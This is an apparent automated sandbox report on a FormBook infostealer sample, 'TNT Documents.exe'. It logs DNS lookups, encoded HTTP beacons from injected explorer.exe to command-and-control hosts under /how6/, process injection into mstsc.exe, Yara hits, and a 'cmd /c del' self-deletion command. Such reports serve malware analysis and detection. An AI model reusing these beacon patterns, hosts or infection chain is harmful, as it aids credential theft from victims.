                                                                  Dec 2, 2021 18:59:48.931884050 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.950918913 CET804982234.102.136.180192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2021 18:59:22.561023951 CET4995853192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:22.592832088 CET53499588.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:27.700095892 CET5086053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:27.823506117 CET53508608.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:42.128535032 CET5045253192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:42.871825933 CET53504528.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:48.248903990 CET5931053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:48.279051065 CET53593108.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:53.948990107 CET5191953192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:53.979896069 CET53519198.8.8.8192.168.2.7
                                                                  Dec 2, 2021 18:59:58.996303082 CET6429653192.168.2.78.8.8.8
                                                                  Dec 2, 2021 18:59:59.324498892 CET53642968.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:09.559422970 CET5668053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:09.585350990 CET53566808.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:14.876486063 CET5882053192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:14.937154055 CET53588208.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:19.954091072 CET6098353192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:19.995712042 CET53609838.8.8.8192.168.2.7
                                                                  Dec 2, 2021 19:00:25.002089977 CET5228653192.168.2.78.8.8.8
                                                                  Dec 2, 2021 19:00:25.555591106 CET53522868.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Dec 2, 2021 18:59:22.561023951 CET192.168.2.78.8.8.80xb8d4Standard query (0)www.cortepuroiberico.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:27.700095892 CET192.168.2.78.8.8.80x47d2Standard query (0)www.specialtyplastics.onlineA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.128535032 CET192.168.2.78.8.8.80xdbefStandard query (0)www.metronixmedical.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.248903990 CET192.168.2.78.8.8.80xbbe2Standard query (0)www.coached.infoA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:53.948990107 CET192.168.2.78.8.8.80x4020Standard query (0)www.pentagonpublishers.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:58.996303082 CET192.168.2.78.8.8.80xe702Standard query (0)www.projectcentered.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:09.559422970 CET192.168.2.78.8.8.80x47ebStandard query (0)www.functionalsoft.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:14.876486063 CET192.168.2.78.8.8.80xaa06Standard query (0)www.viavelleiloes.onlineA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:19.954091072 CET192.168.2.78.8.8.80x8197Standard query (0)www.pirosconsulting.comA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:25.002089977 CET192.168.2.78.8.8.80xe1bbStandard query (0)www.floridanratraining.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Dec 2, 2021 18:59:22.592832088 CET8.8.8.8192.168.2.70xb8d4No error (0)www.cortepuroiberico.comcortepuroiberico.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:22.592832088 CET8.8.8.8192.168.2.70xb8d4No error (0)cortepuroiberico.com51.255.30.106A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:27.823506117 CET8.8.8.8192.168.2.70x47d2No error (0)www.specialtyplastics.online209.17.116.163A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.871825933 CET8.8.8.8192.168.2.70xdbefNo error (0)www.metronixmedical.commetronixmedical.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:42.871825933 CET8.8.8.8192.168.2.70xdbefNo error (0)metronixmedical.com119.18.54.99A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.279051065 CET8.8.8.8192.168.2.70xbbe2No error (0)www.coached.infocoached.infoCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:48.279051065 CET8.8.8.8192.168.2.70xbbe2No error (0)coached.info34.102.136.180A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:53.979896069 CET8.8.8.8192.168.2.70x4020Name error (3)www.pentagonpublishers.comnonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 18:59:59.324498892 CET8.8.8.8192.168.2.70xe702No error (0)www.projectcentered.comprojectcentered.comCNAME (Canonical name)IN (0x0001)
                                                                  Dec 2, 2021 18:59:59.324498892 CET8.8.8.8192.168.2.70xe702No error (0)projectcentered.com158.69.116.156A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:09.585350990 CET8.8.8.8192.168.2.70x47ebNo error (0)www.functionalsoft.com74.208.236.210A (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:14.937154055 CET8.8.8.8192.168.2.70xaa06Server failure (2)www.viavelleiloes.onlinenonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:19.995712042 CET8.8.8.8192.168.2.70x8197Name error (3)www.pirosconsulting.comnonenoneA (IP address)IN (0x0001)
                                                                  Dec 2, 2021 19:00:25.555591106 CET8.8.8.8192.168.2.70xe1bbServer failure (2)www.floridanratraining.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.cortepuroiberico.com
                                                                  • www.specialtyplastics.online
                                                                  • www.metronixmedical.com
                                                                  • www.coached.info

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.74979451.255.30.10680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:22.638449907 CET14538OUTGET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.cortepuroiberico.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:22.687228918 CET14538INHTTP/1.1 502 Bad Gateway
                                                                  Server: nginx
                                                                  Date: Thu, 02 Dec 2021 17:59:22 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 150
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.749815209.17.116.16380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:36.959983110 CET14601OUTGET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.specialtyplastics.online
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:37.078370094 CET14601INHTTP/1.1 400 Bad Request
                                                                  Server: openresty/1.19.9.1
                                                                  Date: Thu, 02 Dec 2021 17:59:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 163
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.749820119.18.54.9980C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:43.047578096 CET14603OUTGET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.metronixmedical.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:43.231224060 CET14603INHTTP/1.1 302 Found
                                                                  Date: Thu, 02 Dec 2021 17:59:43 GMT
                                                                  Server: Apache
                                                                  Location: https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd
                                                                  Content-Length: 320
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 74 72 6f 6e 69 78 6d 65 64 69 63 61 6c 2e 63 6f 6d 2f 68 6f 77 36 2f 3f 69 4e 39 74 46 42 3d 65 4f 37 41 4b 35 55 54 53 75 71 54 63 6f 58 41 45 34 4a 4b 50 74 35 74 4f 42 76 36 6e 6e 6d 50 6b 30 4d 32 47 30 49 53 70 49 4f 34 6a 57 77 47 77 48 6c 67 44 77 4d 6e 47 58 42 35 53 66 4b 6f 6c 33 55 65 67 58 43 5a 70 67 3d 3d 26 61 6d 70 3b 34 68 3d 37 6e 5f 44 52 4a 47 78 6e 52 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&amp;4h=7n_DRJGxnRd">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.74982234.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:48.300111055 CET14611OUTGET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.coached.info
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:48.478606939 CET14611INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 02 Dec 2021 17:59:48 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "61a4f026-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: TNT Documents.exe PID: 4548 Parent PID: 5372

                                                                  General

                                                                  Start time:18:57:47
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x70000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: TNT Documents.exe PID: 6384 Parent PID: 4548

                                                                  General

                                                                  Start time:18:57:59
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:{path}
                                                                  Imagebase:0x130000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Analysis Process: TNT Documents.exe PID: 6400 Parent PID: 4548

                                                                  General

                                                                  Start time:18:58:01
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:{path}
                                                                  Imagebase:0xaa0000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: explorer.exe PID: 3292 Parent PID: 6400

                                                                  General

                                                                  Start time:18:58:07
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff662bf0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Analysis Process: mstsc.exe PID: 6268 Parent PID: 3292

                                                                  General

                                                                  Start time:18:58:34
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                  Imagebase:0xec0000
                                                                  File size:3444224 bytes
                                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Analysis Process: cmd.exe PID: 1148 Parent PID: 6268

                                                                  General

                                                                  Start time:18:58:39
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del "C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x870000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: conhost.exe PID: 4484 Parent PID: 1148

                                                                  General

                                                                  Start time:18:58:41
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff673460000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >